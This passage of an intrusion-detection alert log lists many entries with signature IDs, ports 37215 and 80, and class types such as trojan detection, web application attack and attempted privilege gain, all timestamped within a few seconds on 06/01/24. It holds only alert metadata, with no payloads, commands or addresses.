              Source Port:42754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.259765
              SID:2829579
              Source Port:55908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.262143
              SID:2829579
              Source Port:35928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.246060
              SID:2030092
              Source Port:35452
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.272711
              SID:2025883
              Source Port:60438
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.240320
              SID:2025883
              Source Port:49912
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.239637
              SID:2025883
              Source Port:45958
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.247342
              SID:2025883
              Source Port:36442
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.305908
              SID:2835222
              Source Port:43726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.256434
              SID:2835222
              Source Port:44020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.288015
              SID:2835222
              Source Port:41204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.238108
              SID:2030092
              Source Port:58212
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.252848
              SID:2835222
              Source Port:45532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.275905
              SID:2829579
              Source Port:45842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.263691
              SID:2835222
              Source Port:57294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.239032
              SID:2030092
              Source Port:51510
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.263651
              SID:2829579
              Source Port:54962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.267351
              SID:2030092
              Source Port:42234
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.238224
              SID:2025883
              Source Port:49524
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.240112
              SID:2025883
              Source Port:47714
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.265552
              SID:2030092
              Source Port:46026
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.288149
              SID:2829579
              Source Port:41042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.241607
              SID:2030092
              Source Port:52886
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.308506
              SID:2835222
              Source Port:52032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.261076
              SID:2835222
              Source Port:44092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.261955
              SID:2835222
              Source Port:47172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.263437
              SID:2835222
              Source Port:44642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.254840
              SID:2030092
              Source Port:50144
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.307552
              SID:2835222
              Source Port:60622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.261791
              SID:2829579
              Source Port:52352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.263326
              SID:2835222
              Source Port:60588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.260639
              SID:2829579
              Source Port:49868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.240221
              SID:2030092
              Source Port:53534
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.255789
              SID:2829579
              Source Port:45840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.275592
              SID:2829579
              Source Port:58496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.288149
              SID:2835222
              Source Port:41042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.254225
              SID:2030092
              Source Port:46648
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.239527
              SID:2030092
              Source Port:34360
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.241470
              SID:2030092
              Source Port:58476
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.253978
              SID:2835222
              Source Port:33038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.239497
              SID:2030092
              Source Port:45190
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.288050
              SID:2835222
              Source Port:53540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.260686
              SID:2829579
              Source Port:57732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.245784
              SID:2025883
              Source Port:59086
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.246812
              SID:2030092
              Source Port:43896
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.245249
              SID:2030092
              Source Port:52570
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.254966
              SID:2025883
              Source Port:58512
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.245720
              SID:2025883
              Source Port:49594
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.251192
              SID:2835222
              Source Port:37366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.240505
              SID:2030092
              Source Port:50218
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.239856
              SID:2025883
              Source Port:54416
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.260509
              SID:2829579
              Source Port:60104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.240636
              SID:2030092
              Source Port:39258
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.253379
              SID:2835222
              Source Port:58048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.258791
              SID:2829579
              Source Port:39256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.253732
              SID:2829579
              Source Port:59608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.244906
              SID:2025883
              Source Port:37372
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.241435
              SID:2025883
              Source Port:48762
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.274390
              SID:2829579
              Source Port:46806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.262188
              SID:2829579
              Source Port:56490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.238205
              SID:2030092
              Source Port:39456
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.274985
              SID:2835222
              Source Port:39966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.247036
              SID:2025883
              Source Port:56362
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.239818
              SID:2025883
              Source Port:50036
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.240725
              SID:2025883
              Source Port:32974
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.274063
              SID:2835222
              Source Port:49540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.239975
              SID:2030092
              Source Port:55520
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.254666
              SID:2835222
              Source Port:38622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.238596
              SID:2025883
              Source Port:32936
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.275552
              SID:2829579
              Source Port:58124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307106
              SID:2835222
              Source Port:41680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.240242
              SID:2025883
              Source Port:34922
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.267731
              SID:2030092
              Source Port:60162
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.244628
              SID:2025883
              Source Port:53316
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.275098
              SID:2829579
              Source Port:49218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.239781
              SID:2025883
              Source Port:50078
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.238679
              SID:2025883
              Source Port:59368
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.307965
              SID:2835222
              Source Port:41492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.256554
              SID:2829579
              Source Port:51224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.253439
              SID:2835222
              Source Port:39642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.244558
              SID:2025883
              Source Port:56334
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.261256
              SID:2835222
              Source Port:46470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307042
              SID:2829579
              Source Port:47800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.265263
              SID:2030092
              Source Port:45520
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.274736
              SID:2829579
              Source Port:40134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.256242
              SID:2829579
              Source Port:45778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.239961
              SID:2025883
              Source Port:38194
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.274322
              SID:2835222
              Source Port:53616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.264930
              SID:2030092
              Source Port:46744
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.256952
              SID:2829579
              Source Port:37148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.308033
              SID:2829579
              Source Port:46284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.265963
              SID:2030092
              Source Port:60520
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.238269
              SID:2030092
              Source Port:46164
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.254586
              SID:2829579
              Source Port:54026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.262860
              SID:2835222
              Source Port:37250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.259969
              SID:2835222
              Source Port:33794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.306951
              SID:2829579
              Source Port:48620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.254230
              SID:2835222
              Source Port:49224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.239557
              SID:2025883
              Source Port:56234
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.253835
              SID:2829579
              Source Port:50112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.265799
              SID:2030092
              Source Port:53992
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.240367
              SID:2025883
              Source Port:33706
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.251351
              SID:2829579
              Source Port:45328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.287440
              SID:2030092
              Source Port:40740
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.241927
              SID:2025883
              Source Port:52486
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.265775
              SID:2030092
              Source Port:49706
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.247003
              SID:2025883
              Source Port:40782
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.246473
              SID:2030092
              Source Port:50956
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.252592
              SID:2829579
              Source Port:41724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.246141
              SID:2025883
              Source Port:37370
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.306077
              SID:2829579
              Source Port:34742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.240978
              SID:2030092
              Source Port:53558
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.245498
              SID:2030092
              Source Port:42136
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.261120
              SID:2835222
              Source Port:48334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.264843
              SID:2030092
              Source Port:45868
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.256393
              SID:2835222
              Source Port:36614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.275251
              SID:2829579
              Source Port:54080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.240025
              SID:2025883
              Source Port:33688
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.233813
              SID:2835222
              Source Port:49364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.265512
              SID:2030092
              Source Port:45236
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.238377
              SID:2030092
              Source Port:42178
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.255551
              SID:2829579
              Source Port:39538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.237869
              SID:2030092
              Source Port:53862
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.252324
              SID:2835222
              Source Port:41586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.237993
              SID:2030092
              Source Port:47054
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.256497
              SID:2829579
              Source Port:34852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.240062
              SID:2030092
              Source Port:51500
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.240794
              SID:2030092
              Source Port:33210
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.241160
              SID:2025883
              Source Port:42950
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.252358
              SID:2829579
              Source Port:59700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252286
              SID:2835222
              Source Port:52362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.287888
              SID:2829579
              Source Port:37586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.306738
              SID:2829579
              Source Port:44436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.261312
              SID:2829579
              Source Port:35684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.246870
              SID:2025883
              Source Port:60716
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.260976
              SID:2829579
              Source Port:55978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.254818
              SID:2835222
              Source Port:38566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.260163
              SID:2829579
              Source Port:37114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.265899
              SID:2030092
              Source Port:37148
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.239533
              SID:2025883
              Source Port:41362
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.262262
              SID:2829579
              Source Port:39182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.261518
              SID:2829579
              Source Port:37822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.240919
              SID:2030092
              Source Port:33878
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.275135
              SID:2835222
              Source Port:39124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.246794
              SID:2025883
              Source Port:43646
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.251867
              SID:2829579
              Source Port:53694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.240886
              SID:2025883
              Source Port:39732
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.274578
              SID:2829579
              Source Port:48220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307218
              SID:2835222
              Source Port:51982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.308362
              SID:2829579
              Source Port:35150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.240667
              SID:2025883
              Source Port:39030
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.308485
              SID:2829579
              Source Port:56528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.266133
              SID:2030092
              Source Port:32978
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.251978
              SID:2829579
              Source Port:51176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307586
              SID:2829579
              Source Port:41184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.256096
              SID:2835222
              Source Port:35190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.246355
              SID:2030092
              Source Port:47646
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.252052
              SID:2829579
              Source Port:53482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.239819
              SID:2025883
              Source Port:44778
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.241011
              SID:2025883
              Source Port:46490
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.237719
              SID:2025883
              Source Port:54410
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.306706
              SID:2835222
              Source Port:37724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.305968
              SID:2835222
              Source Port:59194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.241257
              SID:2030092
              Source Port:38354
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.256689
              SID:2829579
              Source Port:52956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.257008
              SID:2835222
              Source Port:58146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.255441
              SID:2829579
              Source Port:52168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.267998
              SID:2030092
              Source Port:49096
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.257094
              SID:2829579
              Source Port:51850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.237774
              SID:2025883
              Source Port:60472
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.239716
              SID:2025883
              Source Port:52274
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.238499
              SID:2030092
              Source Port:34700
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.274356
              SID:2835222
              Source Port:46882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.251379
              SID:2829579
              Source Port:36386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.237923
              SID:2030092
              Source Port:58546
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.255441
              SID:2025883
              Source Port:50510
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.306901
              SID:2835222
              Source Port:34652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.246983
              SID:2030092
              Source Port:57912
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.305908
              SID:2829579
              Source Port:43726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.254997
              SID:2835222
              Source Port:40604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.262143
              SID:2835222
              Source Port:35928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.233750
              SID:2835222
              Source Port:34658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.240081
              SID:2030092
              Source Port:33834
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.240757
              SID:2030092
              Source Port:56784
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.256369
              SID:2835222
              Source Port:51756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.239929
              SID:2025883
              Source Port:36546
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.251475
              SID:2835222
              Source Port:56050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.246870
              SID:2030092
              Source Port:60716
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.252766
              SID:2835222
              Source Port:55648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.255297
              SID:2030092
              Source Port:51122
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.255667
              SID:2835222
              Source Port:57142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.245577
              SID:2030092
              Source Port:52106
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.253117
              SID:2835222
              Source Port:51976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274187
              SID:2829579
              Source Port:35414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.254886
              SID:2030092
              Source Port:59050
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.254555
              SID:2030092
              Source Port:34994
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.241927
              SID:2030092
              Source Port:52486
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.239572
              SID:2030092
              Source Port:50710
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.245225
              SID:2025883
